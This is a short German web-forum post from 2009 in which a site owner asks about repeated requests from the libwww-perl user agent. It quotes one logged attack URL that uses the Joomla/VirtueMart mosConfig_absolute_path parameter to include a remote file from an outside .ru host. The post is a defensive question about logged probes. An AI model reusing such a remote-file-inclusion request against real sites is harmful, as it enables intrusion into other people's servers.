Frage zu libwww-perl
Verfasst: 03.01.2009, 14:29
Hallo,
seid einiger Zeit habe ich zugriffe von dem Agent "libwww-perl/5.79". Er ruft Seiten auf wie
Die Angriffe kommen auch über eine andere Seite, welche die Variable $_GET["u"] weiterverarbeitet. Da gibt es aber vorher die Abfrage, ob dieser Wert numerisch ist, bevor sie verarbeitet wird. Denke, dass sollte doch auch sicher sein, oder?
Hat da jemand Erfahrung? Können diese Attacken mir was? Wenn ja, was tun (Shared Server), wenn nein, warum attackieren die dann ständig?
Vielen Dank Euch allen im Voraus.
seid einiger Zeit habe ich zugriffe von dem Agent "libwww-perl/5.79". Er ruft Seiten auf wie
Ich habe mal ein bißchen recherchiert. Das heißt wohl, dass da jemand versucht, fremden Code, der über den GETTER "mosConfig_absolute_path" kommt einzuschleusen. Meine index.php nimmt allerdings gar keine $_GET auf, ich verarbeite auch nirgends so etwas wie $_GET["mosConfig..."]. Deshalb fühle ich mich eigentlich recht sicher, allerdings kommen die Angriffe regelmäßig. Das würde man doch nicht machen, wenn da nicht irgendwas klappen würde, oder?/ind ex.php?o ption=com_virtuem art&p age=shop.browse &categor y_id=&keyword=& manufacturer_id= &Itemid= &mosConfi g_absolute_path=http:/ /w ww.e lite whe els. ru/ima ges/stori es/.c n n?
Die Angriffe kommen auch über eine andere Seite, welche die Variable $_GET["u"] weiterverarbeitet. Da gibt es aber vorher die Abfrage, ob dieser Wert numerisch ist, bevor sie verarbeitet wird. Denke, dass sollte doch auch sicher sein, oder?
Hat da jemand Erfahrung? Können diese Attacken mir was? Wenn ja, was tun (Shared Server), wenn nein, warum attackieren die dann ständig?
Vielen Dank Euch allen im Voraus.
